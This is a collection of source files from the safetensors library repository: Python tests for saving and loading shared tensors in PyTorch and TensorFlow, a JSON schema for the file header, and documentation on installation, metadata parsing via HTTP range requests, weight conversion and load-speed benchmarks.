135 | self.assertEqual(_remove_duplicate_names({"A": A, "B": B}), {"A": ["B"]})
136 | self.assertEqual(_remove_duplicate_names({"A": A, "B": B, "C": A}), {"A": ["B", "C"]})
137 | with self.assertRaises(RuntimeError):
138 | self.assertEqual(_remove_duplicate_names({"B": B}), [])
139 |
140 | def test_failure(self):
141 | model = Model()
142 | with self.assertRaises(RuntimeError):
143 | save_file(model.state_dict(), "tmp.safetensors")
144 |
145 | # def test_workaround_refuse(self):
146 | # model = Model()
147 | # A = torch.zeros((1000, 10))
148 | # a = A[:100, :]
149 | # model.a.weight = torch.nn.Parameter(a)
150 | # with self.assertRaises(RuntimeError) as ctx:
151 | # save_model(model, "tmp4.safetensors")
152 | # self.assertIn(".Refusing to save/load the model since you could be storing much more memory than needed.", str(ctx.exception))
153 |
154 | def test_save(self):
155 | # Just testing the actual saved file to make sure we're ok on big endian
156 | model = OnesModel()
157 | save_model(model, "tmp_ones.safetensors")
158 | with safe_open("tmp_ones.safetensors", framework="pt") as f:
159 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"})
160 |
161 | # 192 hardcoded to skip the header, metadata order is random.
162 | self.assertEqual(
163 | open("tmp_ones.safetensors", "rb").read()[192:],
164 | b"""\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?""",
165 | )
166 |
167 | model2 = OnesModel()
168 | load_model(model2, "tmp_ones.safetensors")
169 |
170 | state_dict = model.state_dict()
171 | for k, v in model2.state_dict().items():
172 | torch.testing.assert_close(v, state_dict[k])
173 |
174 | def test_workaround(self):
175 | model = Model()
176 | save_model(model, "tmp.safetensors")
177 | with safe_open("tmp.safetensors", framework="pt") as f:
178 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"})
179 |
180 | model2 = Model()
181 | load_model(model2, "tmp.safetensors")
182 |
183 | state_dict = model.state_dict()
184 | for k, v in model2.state_dict().items():
185 | torch.testing.assert_close(v, state_dict[k])
186 |
187 | def test_workaround_works_with_different_on_file_names(self):
188 | model = Model()
189 | state_dict = model.state_dict()
190 | state_dict.pop("a.weight")
191 | state_dict.pop("a.bias")
192 | save_file(state_dict, "tmp.safetensors")
193 |
194 | model2 = Model()
195 | load_model(model2, "tmp.safetensors")
196 |
197 | state_dict = model.state_dict()
198 | for k, v in model2.state_dict().items():
199 | torch.testing.assert_close(v, state_dict[k])
200 |
201 | def test_workaround_non_contiguous(self):
202 | model = NonContiguousModel()
203 |
204 | with self.assertRaises(ValueError) as ctx:
205 | save_model(model, "tmp_c.safetensors", force_contiguous=False)
206 | self.assertIn("use save_model(..., force_contiguous=True)", str(ctx.exception))
207 | save_model(model, "tmp_c.safetensors", force_contiguous=True)
208 |
209 | model2 = NonContiguousModel()
210 | load_model(model2, "tmp_c.safetensors")
211 |
212 | state_dict = model.state_dict()
213 | for k, v in model2.state_dict().items():
214 | torch.testing.assert_close(v, state_dict[k])
215 |
216 | def test_workaround_copy(self):
217 | model = CopyModel()
218 | self.assertEqual(
219 | _find_shared_tensors(model.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}]
220 | )
221 | save_model(model, "tmp.safetensors")
222 |
223 | model2 = CopyModel()
224 | load_model(model2, "tmp.safetensors")
225 |
226 | state_dict = model.state_dict()
227 | for k, v in model2.state_dict().items():
228 | torch.testing.assert_close(v, state_dict[k])
229 |
230 | def test_difference_with_torch(self):
231 | model = Model()
232 | torch.save(model.state_dict(), "tmp2.bin")
233 |
234 | model2 = NoSharedModel()
235 | # This passes on torch.
236 |         # The tensors are shared on disk, but they are *not* shared within the model.
237 |         # The model happily loads the tensors, and ends up *not* sharing them,
238 |         # by doing copies.
239 | self.assertEqual(
240 | _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}]
241 | )
242 | model2.load_state_dict(torch.load("tmp2.bin"))
243 | self.assertEqual(
244 | _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}]
245 | )
246 |
247 | # However safetensors cannot save those, so we cannot
248 | # reload the saved file with the different model
249 | save_model(model, "tmp2.safetensors")
250 | with self.assertRaises(RuntimeError) as ctx:
251 | load_model(model2, "tmp2.safetensors")
252 | self.assertIn("""Missing key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception))
253 |
254 | def test_difference_torch_odd(self):
255 | model = NoSharedModel()
256 | a = model.a.weight
257 | b = model.b.weight
258 | self.assertNotEqual(a.data_ptr(), b.data_ptr())
259 | torch.save(model.state_dict(), "tmp3.bin")
260 |
261 | model2 = Model()
262 | self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}])
263 |         # Torch will assign either `b` or `a` to the shared tensor in `model2`
264 | model2.load_state_dict(torch.load("tmp3.bin"))
265 |
266 | # XXX: model2 uses only the B weight not the A weight anymore.
267 | self.assertFalse(torch.allclose(model2.a.weight, model.a.weight))
268 | torch.testing.assert_close(model2.a.weight, model.b.weight)
269 | self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}])
270 |
271 | # Everything is saved as-is
272 | save_model(model, "tmp3.safetensors")
273 | # safetensors will yell that there were 2 tensors on disk, while
274 |         # the model expects only 1 tensor since both are shared.
275 | with self.assertRaises(RuntimeError) as ctx:
276 | load_model(model2, "tmp3.safetensors")
277 |         # Safetensors properly warns the user that some keys are unexpected.
278 | self.assertIn("""Unexpected key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception))
279 |
--------------------------------------------------------------------------------
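The shared-tensor workaround these tests exercise, in isolation: `save_model` deduplicates tensors that share storage and records the dropped names as aliases in the header metadata, and `load_model` accepts the deduplicated file. A minimal sketch mirroring the `Model` class above:

```python
import torch

from safetensors.torch import load_model, save_model


class Tied(torch.nn.Module):
    def __init__(self):
        super().__init__()
        self.a = torch.nn.Linear(4, 4)
        self.b = self.a  # shared weights, as in Model above


model = Tied()
save_model(model, "tied.safetensors")   # one copy on disk; aliases in metadata
model2 = Tied()
load_model(model2, "tied.safetensors")  # loads despite the deduplicated names
```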
/bindings/python/tests/test_tf_comparison.py:
--------------------------------------------------------------------------------
1 | import unittest
2 |
3 | import h5py
4 | import numpy as np
5 | import tensorflow as tf
6 |
7 | from safetensors import safe_open
8 | from safetensors.tensorflow import load_file, save_file
9 |
10 |
11 | def _load(f, tensors=None, prefix=""):
12 | if tensors is None:
13 | tensors = {}
14 | for k in f.keys():
15 | if isinstance(f[k], h5py._hl.dataset.Dataset):
16 | key = k if not prefix else f"{prefix}_{k}"
17 | tensors[key] = tf.convert_to_tensor(np.array(f[k]))
18 | else:
19 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}"))
20 | return tensors
21 |
22 |
23 | def _save(f, tensors, prefix=""):
24 | for name, tensor in tensors.items():
25 | tensor = tensor.numpy()
26 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype)
27 | dset[:] = tensor
28 |
29 |
30 | class SafeTestCase(unittest.TestCase):
31 | def setUp(self):
32 | data = {
33 | "test": tf.zeros((1024, 1024), dtype=tf.float32),
34 | "test2": tf.zeros((1024, 1024), dtype=tf.float32),
35 | "test3": tf.zeros((1024, 1024), dtype=tf.float32),
36 | }
37 | self.tf_filename = "./tests/data/tf_load.h5"
38 | self.sf_filename = "./tests/data/tf_load.safetensors"
39 |
40 | with h5py.File(self.tf_filename, "w") as f:
41 | _save(f, data)
42 | save_file(data, self.sf_filename)
43 |
44 | def test_zero_sized(self):
45 | data = {
46 | "test": tf.zeros((2, 0), dtype=tf.float32),
47 | }
48 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
49 | save_file(data.copy(), local)
50 | reloaded = load_file(local)
51 | # Empty tensor != empty tensor on numpy, so comparing shapes
52 | # instead
53 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
54 |
55 | def test_deserialization_safe(self):
56 | weights = load_file(self.sf_filename)
57 |
58 | with h5py.File(self.tf_filename, "r") as f:
59 | tf_weights = _load(f)
60 |
61 | for k, v in weights.items():
62 | tv = tf_weights[k]
63 | self.assertTrue(np.allclose(v, tv))
64 |
65 | def test_bfloat16(self):
66 | data = {
67 | "test": tf.random.normal((1024, 1024), dtype=tf.bfloat16),
68 | }
69 | save_file(data, self.sf_filename)
70 | weights = {}
71 | with safe_open(self.sf_filename, framework="tf") as f:
72 | for k in f.keys():
73 | weights[k] = f.get_tensor(k)
74 |
75 | for k, v in weights.items():
76 | tv = data[k]
77 | self.assertTrue(tf.experimental.numpy.allclose(v, tv))
78 |
79 | def test_deserialization_safe_open(self):
80 | weights = {}
81 | with safe_open(self.sf_filename, framework="tf") as f:
82 | for k in f.keys():
83 | weights[k] = f.get_tensor(k)
84 |
85 | with h5py.File(self.tf_filename, "r") as f:
86 | tf_weights = _load(f)
87 |
88 | for k, v in weights.items():
89 | tv = tf_weights[k]
90 | self.assertTrue(np.allclose(v, tv))
91 |
--------------------------------------------------------------------------------
/codecov.yaml:
--------------------------------------------------------------------------------
1 | comment: false
2 |
--------------------------------------------------------------------------------
/codecov.yml:
--------------------------------------------------------------------------------
1 | comment: false
2 |
--------------------------------------------------------------------------------
/docs/safetensors.schema.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://json-schema.org/draft/2020-12/schema",
3 | "title": "safetensors format header",
4 | "description": "Describes the structure of all the tensors and their metadata",
5 | "$defs": {
6 | "size_t": {
7 | "type": "integer",
8 | "minimum": 0,
9 | "maximum": 281474976710655,
10 | "description": "A natural integer no more than 48 bits (current CPU limitation, not all 64 bits are used)"
11 | },
12 | "Tensor": {
13 | "title": "Tensor",
14 | "description": "Describes the structure of one tensor",
15 | "type": "object",
16 | "additionalProperties": false,
17 | "properties": {
18 | "dtype": {
19 | "type": "string",
20 | "pattern": "([UIF])(8|16|32|64|128|256)",
21 | "description": "Type of the array. U - unsigned int, I - signed int, F - IEEE 754 floating-point. Number is the count of bits."
22 | },
23 | "shape": {
24 | "type": "array",
25 | "items": {
26 | "$ref": "#/$defs/size_t",
27 | "description": "Size of each dimension."
28 | }
29 | },
30 | "data_offsets": {
31 | "type": "array",
32 | "prefixItems": [
33 | {
34 | "$ref": "#/$defs/size_t",
35 | "description": "Start offset of the array. "
36 | },
37 | {
38 | "$ref": "#/$defs/size_t",
39 | "description": "End offset of the array. Equal to the previous item + array size."
40 | }
41 | ]
42 | }
43 | },
44 | "required": [
45 | "data_offsets",
46 | "dtype",
47 | "shape"
48 | ]
49 | },
50 | "Metadata": {
51 | "type": "object",
52 | "additionalProperties": {"type": "string"},
53 | "title": "Metadata"
54 | }
55 | },
56 | "type": "object",
57 | "properties": {
58 | "__metadata__": {
59 | "description": "Arbitrary metadata",
60 | "$ref": "#/$defs/Metadata"
61 | }
62 | },
63 | "additionalProperties": {
64 | "$ref": "#/$defs/Tensor"
65 | }
66 | }
67 |
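For reference, here is a minimal header instance that validates against this schema (the tensor name, shape, and offsets are illustrative only; a 2x2 `F32` tensor occupies 2 * 2 * 4 = 16 bytes, hence the `data_offsets` span):

```json
{
  "__metadata__": { "format": "pt" },
  "embedding": {
    "dtype": "F32",
    "shape": [2, 2],
    "data_offsets": [0, 16]
  }
}
```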
--------------------------------------------------------------------------------
/docs/source/_toctree.yml:
--------------------------------------------------------------------------------
1 | - sections:
2 | - local: index
3 | title: 🤗 Safetensors
4 | - local: speed
5 | title: Speed Comparison
6 | - local: torch_shared_tensors
7 | title: Tensor Sharing in Pytorch
8 | - local: metadata_parsing
9 | title: Metadata Parsing
10 | - local: convert-weights
11 | title: Convert weights to safetensors
12 | title: Getting started
13 | - sections:
14 | - local: api/torch
15 | title: Torch API
16 | - local: api/tensorflow
17 | title: Tensorflow API
18 | - local: api/paddle
19 | title: PaddlePaddle API
20 | - local: api/flax
21 | title: Flax API
22 | - local: api/numpy
23 | title: Numpy API
24 | title: API
25 |
--------------------------------------------------------------------------------
/docs/source/api/flax.mdx:
--------------------------------------------------------------------------------
1 | # Flax API
2 |
3 | [[autodoc]] safetensors.flax.load_file
4 | [[autodoc]] safetensors.flax.load
5 | [[autodoc]] safetensors.flax.save_file
6 | [[autodoc]] safetensors.flax.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/numpy.mdx:
--------------------------------------------------------------------------------
1 | # Numpy API
2 |
3 | [[autodoc]] safetensors.numpy.load_file
4 | [[autodoc]] safetensors.numpy.load
5 | [[autodoc]] safetensors.numpy.save_file
6 | [[autodoc]] safetensors.numpy.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/paddle.mdx:
--------------------------------------------------------------------------------
1 | # PaddlePaddle API
2 |
3 | [[autodoc]] safetensors.paddle.load_file
4 | [[autodoc]] safetensors.paddle.load
5 | [[autodoc]] safetensors.paddle.save_file
6 | [[autodoc]] safetensors.paddle.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/tensorflow.mdx:
--------------------------------------------------------------------------------
1 | # Tensorflow API
2 |
3 | [[autodoc]] safetensors.tensorflow.load_file
4 | [[autodoc]] safetensors.tensorflow.load
5 | [[autodoc]] safetensors.tensorflow.save_file
6 | [[autodoc]] safetensors.tensorflow.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/torch.mdx:
--------------------------------------------------------------------------------
1 | # Torch API
2 |
3 | [[autodoc]] safetensors.torch.load_file
4 | [[autodoc]] safetensors.torch.load
5 | [[autodoc]] safetensors.torch.save_file
6 | [[autodoc]] safetensors.torch.save
7 | [[autodoc]] safetensors.torch.load_model
8 | [[autodoc]] safetensors.torch.save_model
9 |
--------------------------------------------------------------------------------
/docs/source/convert-weights.md:
--------------------------------------------------------------------------------
1 | # Convert weights to safetensors
2 |
3 | PyTorch model weights are commonly saved and stored as `.bin` files with Python's [`pickle`](https://docs.python.org/3/library/pickle.html) utility. To save and store your model weights in the more secure `safetensors` format, we recommend converting your weights to `.safetensors`.
4 |
5 | The easiest way to convert your model weights is to use the [Convert Space](https://huggingface.co/spaces/safetensors/convert), provided your model weights are already stored on the Hub. The Convert Space downloads the pickled weights, converts them, and opens a Pull Request to upload the newly converted `.safetensors` file to your repository.
6 |
7 |
8 |
9 | For larger models, the Space may be a bit slower because its resources are tied up in converting other models. You can also try running the [convert.py](https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py) script (this is what the Space is running) locally to convert your weights.
10 |
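As a rough sketch, a local run might look like this (the exact arguments may differ between versions; check `python convert.py --help`, and note the model id below is just an example):

```bash
git clone https://github.com/huggingface/safetensors
cd safetensors/bindings/python
pip install safetensors torch transformers huggingface_hub
python convert.py gpt2
```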
11 | Feel free to ping [@Narsil](https://huggingface.co/Narsil) for any issues with the Space.
12 |
13 |
14 |
--------------------------------------------------------------------------------
/docs/source/index.mdx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | # Safetensors
9 |
10 | Safetensors is a new, simple format for storing tensors safely (as opposed to pickle) while remaining fast (zero-copy). Safetensors is really [fast 🚀](./speed).
11 |
12 | ## Installation
13 |
14 | with pip:
15 | ```
16 | pip install safetensors
17 | ```
18 |
19 | with conda:
20 | ```
21 | conda install -c huggingface safetensors
22 | ```
23 |
24 | ## Usage
25 |
26 | ### Load tensors
27 |
28 | ```python
29 | from safetensors import safe_open
30 |
31 | tensors = {}
32 | with safe_open("model.safetensors", framework="pt", device=0) as f:
33 | for k in f.keys():
34 | tensors[k] = f.get_tensor(k)
35 | ```
36 |
37 | Loading only part of the tensors (useful when running on multiple GPUs)
38 |
39 | ```python
40 | from safetensors import safe_open
41 |
42 | tensors = {}
43 | with safe_open("model.safetensors", framework="pt", device=0) as f:
44 | tensor_slice = f.get_slice("embedding")
45 | vocab_size, hidden_dim = tensor_slice.get_shape()
46 | tensor = tensor_slice[:, :hidden_dim]
47 | ```
48 |
49 | ### Save tensors
50 |
51 | ```python
52 | import torch
53 | from safetensors.torch import save_file
54 |
55 | tensors = {
56 | "embedding": torch.zeros((2, 2)),
57 | "attention": torch.zeros((2, 3))
58 | }
59 | save_file(tensors, "model.safetensors")
60 | ```
61 |
62 | ## Format
63 |
64 | Say you have a safetensors file named `model.safetensors`; it will have the following internal format:
65 |
66 |
67 |
68 |
69 |
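In plain terms, the on-disk layout is:

```
[ 8 bytes | little-endian u64: N, the size of the JSON header            ]
[ N bytes | JSON header: dtype, shape, data_offsets per tensor           ]
[ rest    | byte buffer holding the tensor data, addressed by the offsets ]
```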
70 | ## Featured Projects
71 |
72 | Safetensors is being used widely at leading AI enterprises, such as [Hugging Face](https://huggingface.co/), [EleutherAI](https://www.eleuther.ai/), and [StabilityAI](https://stability.ai/). Here is a non-exhaustive list of projects that are using safetensors:
73 |
74 | * [huggingface/transformers](https://github.com/huggingface/transformers)
75 | * [ml-explore/mlx](https://github.com/ml-explore/mlx)
76 | * [huggingface/candle](https://github.com/huggingface/candle)
77 | * [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui)
78 | * [Llama-cpp](https://github.com/ggerganov/llama.cpp/blob/e6a46b0ed1884c77267dc70693183e3b7164e0e0/convert.py#L537)
79 | * [microsoft/TaskMatrix](https://github.com/microsoft/TaskMatrix)
80 | * [hpcaitech/ColossalAI](https://github.com/hpcaitech/ColossalAI)
81 | * [huggingface/pytorch-image-models](https://github.com/huggingface/pytorch-image-models)
82 | * [CivitAI](https://civitai.com/)
83 | * [huggingface/diffusers](https://github.com/huggingface/diffusers)
84 | * [coreylowman/dfdx](https://github.com/coreylowman/dfdx)
85 | * [invoke-ai/InvokeAI](https://github.com/invoke-ai/InvokeAI)
86 | * [oobabooga/text-generation-webui](https://github.com/oobabooga/text-generation-webui)
87 | * [Sanster/lama-cleaner](https://github.com/Sanster/lama-cleaner)
88 | * [PaddlePaddle/PaddleNLP](https://github.com/PaddlePaddle/PaddleNLP)
89 | * [AIGC-Audio/AudioGPT](https://github.com/AIGC-Audio/AudioGPT)
90 | * [brycedrennan/imaginAIry](https://github.com/brycedrennan/imaginAIry)
91 | * [comfyanonymous/ComfyUI](https://github.com/comfyanonymous/ComfyUI)
92 | * [LianjiaTech/BELLE](https://github.com/LianjiaTech/BELLE)
93 | * [alvarobartt/safejax](https://github.com/alvarobartt/safejax)
94 | * [MaartenGr/BERTopic](https://github.com/MaartenGr/BERTopic)
95 | * [rachthree/safestructures](https://github.com/rachthree/safestructures)
96 | * [justinchuby/onnx-safetensors](https://github.com/justinchuby/onnx-safetensors)
97 |
--------------------------------------------------------------------------------
/docs/source/metadata_parsing.mdx:
--------------------------------------------------------------------------------
1 | # Metadata Parsing
2 |
3 | Given the simplicity of the format, it's cheap and efficient to fetch and parse metadata about Safetensors weights – i.e. the list of tensors, their types, and their shapes or numbers of parameters – using small [(Range) HTTP requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests).
4 |
5 | This parsing has been implemented in JS in [`huggingface.js`](https://huggingface.co/docs/huggingface.js/main/en/hub/modules#parsesafetensorsmetadata) (sample code below), but it would be similar in any language.
6 |
7 | ## Example use case
8 |
9 | There can be many potential use cases. For instance, we use it on the HuggingFace Hub to display info about models which have safetensors weights:
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 | ## Usage
22 |
23 |
24 |
25 |
26 | From the [🤗 Hub](https://hf.co/models), you can get the metadata of a model with [HTTP range requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests) instead of downloading the entire safetensors file with all the weights. The example Python script below (any language with HTTP support will do) parses the metadata of [gpt2](https://huggingface.co/gpt2/blob/main/model.safetensors).
27 |
28 | ```python
29 | import requests # pip install requests
30 | import struct
31 |
32 | def parse_single_file(url):
33 | # Fetch the first 8 bytes of the file
34 | headers = {'Range': 'bytes=0-7'}
35 | response = requests.get(url, headers=headers)
36 | # Interpret the bytes as a little-endian unsigned 64-bit integer
37 | length_of_header = struct.unpack('<Q', response.content)[0]
38 | # Fetch the JSON header: `length_of_header` bytes starting at byte 8
39 | headers = {'Range': f'bytes=8-{7 + length_of_header}'}
40 | response = requests.get(url, headers=headers)
41 | # Interpret the response as a JSON object
42 | header = response.json()
43 | return header
44 |
45 | url = "https://huggingface.co/gpt2/resolve/main/model.safetensors"
46 | header = parse_single_file(url)
47 | print(header)
48 | # {
49 | # "__metadata__": {"format": "pt"},
50 | # "wpe.weight": {"dtype": "F32", "shape": [1024, 768], "data_offsets": [...]},
51 | # "wte.weight": {"dtype": "F32", "shape": [50257, 768], "data_offsets": [...]},
52 | # ...
53 | # }
54 | ```
55 |
56 |
57 |
58 |
59 |
60 |
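To eyeball those first 8 bytes without writing any code, a shell one-liner works too (`-r` sends the `Range` header, `-L` follows the redirect to the CDN):

```bash
curl -sL -r 0-7 https://huggingface.co/gpt2/resolve/main/model.safetensors | xxd
```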
61 |
62 | Using [`huggingface.js`](https://huggingface.co/docs/huggingface.js)
63 |
64 | ```ts
65 | import { parseSafetensorsMetadata } from "@huggingface/hub";
66 |
67 | const info = await parseSafetensorsMetadata({
68 | repo: { type: "model", name: "bigscience/bloom" },
69 | });
70 |
71 | console.log(info)
72 | // {
73 | // sharded: true,
74 | // index: {
75 | // metadata: { total_size: 352494542848 },
76 | // weight_map: {
77 | // 'h.0.input_layernorm.bias': 'model_00002-of-00072.safetensors',
78 | // ...
79 | // }
80 | // },
81 | // headers: {
82 | // __metadata__: {'format': 'pt'},
83 | // 'h.2.attn.c_attn.weight': {'dtype': 'F32', 'shape': [768, 2304], 'data_offsets': [541012992, 548090880]},
84 | // ...
85 | // }
86 | // }
87 | ```
88 |
89 | Depending on whether the safetensors weights are sharded into multiple files or not, the output of the call above will be:
90 |
91 | ```ts
92 | export type SafetensorsParseFromRepo =
93 | | {
94 | sharded: false;
95 | header: SafetensorsFileHeader;
96 | }
97 | | {
98 | sharded: true;
99 | index: SafetensorsIndexJson;
100 | headers: SafetensorsShardedHeaders;
101 | };
102 | ```
103 |
104 | where the underlying `types` are the following:
105 |
106 | ```ts
107 | type FileName = string;
108 |
109 | type TensorName = string;
110 | type Dtype = "F64" | "F32" | "F16" | "BF16" | "I64" | "I32" | "I16" | "I8" | "U8" | "BOOL";
111 |
112 | interface TensorInfo {
113 | dtype: Dtype;
114 | shape: number[];
115 | data_offsets: [number, number];
116 | }
117 |
118 | type SafetensorsFileHeader = Record<TensorName, TensorInfo> & {
119 | __metadata__: Record<string, string>;
120 | };
121 |
122 | interface SafetensorsIndexJson {
123 | weight_map: Record<TensorName, FileName>;
124 | }
125 |
126 | export type SafetensorsShardedHeaders = Record<FileName, SafetensorsFileHeader>;
127 | ```
128 |
129 |
130 |
131 | [`huggingface_hub`](https://huggingface.co/docs/huggingface_hub) provides a Python API to parse safetensors metadata.
132 | Use [`get_safetensors_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.get_safetensors_metadata) to get all safetensors metadata of a model.
133 | Depending on whether the model is sharded, one or more safetensors files will be parsed.
134 |
135 | ```python
136 | >>> from huggingface_hub import get_safetensors_metadata
137 |
138 | # Parse repo with single weights file
139 | >>> metadata = get_safetensors_metadata("bigscience/bloomz-560m")
140 | >>> metadata
141 | SafetensorsRepoMetadata(
142 | metadata=None,
143 | sharded=False,
144 | weight_map={'h.0.input_layernorm.bias': 'model.safetensors', ...},
145 | files_metadata={'model.safetensors': SafetensorsFileMetadata(...)}
146 | )
147 | >>> metadata.files_metadata["model.safetensors"].metadata
148 | {'format': 'pt'}
149 |
150 | # Parse repo with sharded model (i.e. multiple weights files)
151 | >>> metadata = get_safetensors_metadata("bigscience/bloom")
152 | Parse safetensors files: 100%|██████████████████████████████████████████| 72/72 [00:12<00:00, 5.78it/s]
153 | >>> metadata
154 | SafetensorsRepoMetadata(metadata={'total_size': 352494542848}, sharded=True, weight_map={...}, files_metadata={...})
155 | >>> len(metadata.files_metadata)
156 | 72 # All safetensors files have been fetched
157 |
158 | # Parse repo that is not a safetensors repo
159 | >>> get_safetensors_metadata("runwayml/stable-diffusion-v1-5")
160 | NotASafetensorsRepoError: 'runwayml/stable-diffusion-v1-5' is not a safetensors repo. Couldn't find 'model.safetensors.index.json' or 'model.safetensors' files.
161 | ```
162 |
163 | To parse the metadata of a single safetensors file, use [`parse_safetensors_file_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.parse_safetensors_file_metadata).
164 |
165 |
166 |
167 |
168 | ## Example output
169 |
170 | For instance, here is the number of params per dtype for a few models on the HuggingFace Hub. Also see [this issue](https://github.com/huggingface/safetensors/issues/44) for more usage examples.
171 |
172 | model | safetensors | params
173 | --- | --- | ---
174 | [gpt2](https://huggingface.co/gpt2?show_tensors=true) | single-file | { 'F32' => 137022720 }
175 | [roberta-base](https://huggingface.co/roberta-base?show_tensors=true) | single-file | { 'F32' => 124697433, 'I64' => 514 }
176 | [Jean-Baptiste/camembert-ner](https://huggingface.co/Jean-Baptiste/camembert-ner?show_tensors=true) | single-file | { 'F32' => 110035205, 'I64' => 514 }
177 | [roberta-large](https://huggingface.co/roberta-large?show_tensors=true) | single-file | { 'F32' => 355412057, 'I64' => 514 }
178 | [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased?show_tensors=true) | single-file | { 'F32' => 67431550 }
179 | [EleutherAI/gpt-neox-20b](https://huggingface.co/EleutherAI/gpt-neox-20b?show_tensors=true) | sharded | { 'F16' => 20554568208, 'U8' => 184549376 }
180 | [bigscience/bloom-560m](https://huggingface.co/bigscience/bloom-560m?show_tensors=true) | single-file | { 'F16' => 559214592 }
181 | [bigscience/bloom](https://huggingface.co/bigscience/bloom?show_tensors=true) | sharded | { 'BF16' => 176247271424 }
182 | [bigscience/bloom-3b](https://huggingface.co/bigscience/bloom-3b?show_tensors=true) | single-file | { 'F16' => 3002557440 }
183 |
--------------------------------------------------------------------------------
/docs/source/speed.mdx:
--------------------------------------------------------------------------------
1 | # Speed Comparison
2 |
3 |
4 |
9 |
10 |
11 | `Safetensors` is really fast. Let's compare it against `PyTorch` by loading [gpt2](https://huggingface.co/gpt2) weights. To run the [GPU benchmark](#gpu-benchmark), make sure your machine has a GPU, or that you have selected a `GPU runtime` if you are using Google Colab.
12 |
13 | Before you begin, make sure you have all the necessary libraries installed:
14 |
15 | ```bash
16 | pip install safetensors huggingface_hub torch
17 | ```
18 |
19 | Let's start by importing all the packages that will be used:
20 |
21 | ```py
22 | >>> import os
23 | >>> import datetime
24 | >>> from huggingface_hub import hf_hub_download
25 | >>> from safetensors.torch import load_file
26 | >>> import torch
27 | ```
28 |
29 | Download safetensors & torch weights for gpt2:
30 |
31 | ```py
32 | >>> sf_filename = hf_hub_download("gpt2", filename="model.safetensors")
33 | >>> pt_filename = hf_hub_download("gpt2", filename="pytorch_model.bin")
34 | ```
35 |
36 | ### CPU benchmark
37 |
38 | ```py
39 | >>> start_st = datetime.datetime.now()
40 | >>> weights = load_file(sf_filename, device="cpu")
41 | >>> load_time_st = datetime.datetime.now() - start_st
42 | >>> print(f"Loaded safetensors {load_time_st}")
43 |
44 | >>> start_pt = datetime.datetime.now()
45 | >>> weights = torch.load(pt_filename, map_location="cpu")
46 | >>> load_time_pt = datetime.datetime.now() - start_pt
47 | >>> print(f"Loaded pytorch {load_time_pt}")
48 |
49 | >>> print(f"on CPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X")
50 | Loaded safetensors 0:00:00.004015
51 | Loaded pytorch 0:00:00.307460
52 | on CPU, safetensors is faster than pytorch by: 76.6 X
53 | ```
54 |
55 | This speedup is due to the fact that this library avoids unnecessary copies by mapping the file directly. It is actually possible to do in [pure pytorch](https://gist.github.com/Narsil/3edeec2669a5e94e4707aa0f901d2282).
56 | The speedup shown here was measured on:
57 | * OS: Ubuntu 18.04.6 LTS
58 | * CPU: Intel(R) Xeon(R) CPU @ 2.00GHz
59 |
60 |
61 | ### GPU benchmark
62 |
63 | ```py
64 | >>> # This is required because this feature hasn't been fully verified yet, but
65 | >>> # it's been tested on many different environments
66 | >>> os.environ["SAFETENSORS_FAST_GPU"] = "1"
67 |
68 | >>> # CUDA startup out of the measurement
69 | >>> torch.zeros((2, 2)).cuda()
70 |
71 | >>> start_st = datetime.datetime.now()
72 | >>> weights = load_file(sf_filename, device="cuda:0")
73 | >>> load_time_st = datetime.datetime.now() - start_st
74 | >>> print(f"Loaded safetensors {load_time_st}")
75 |
76 | >>> start_pt = datetime.datetime.now()
77 | >>> weights = torch.load(pt_filename, map_location="cuda:0")
78 | >>> load_time_pt = datetime.datetime.now() - start_pt
79 | >>> print(f"Loaded pytorch {load_time_pt}")
80 |
81 | >>> print(f"on GPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X")
82 | Loaded safetensors 0:00:00.165206
83 | Loaded pytorch 0:00:00.353889
84 | on GPU, safetensors is faster than pytorch by: 2.1 X
85 | ```
86 |
87 | The speedup works because this library is able to skip unnecessary CPU allocations. It is unfortunately not replicable in pure pytorch as far as we know. The library works by memory mapping the file, creating an empty tensor with pytorch, and calling `cudaMemcpy` directly to move the data straight onto the GPU.
88 | The speedup shown here was measured on:
89 | * OS: Ubuntu 18.04.6 LTS.
90 | * GPU: Tesla T4
91 | * Driver Version: 460.32.03
92 | * CUDA Version: 11.2
93 |
--------------------------------------------------------------------------------
/docs/source/torch_shared_tensors.mdx:
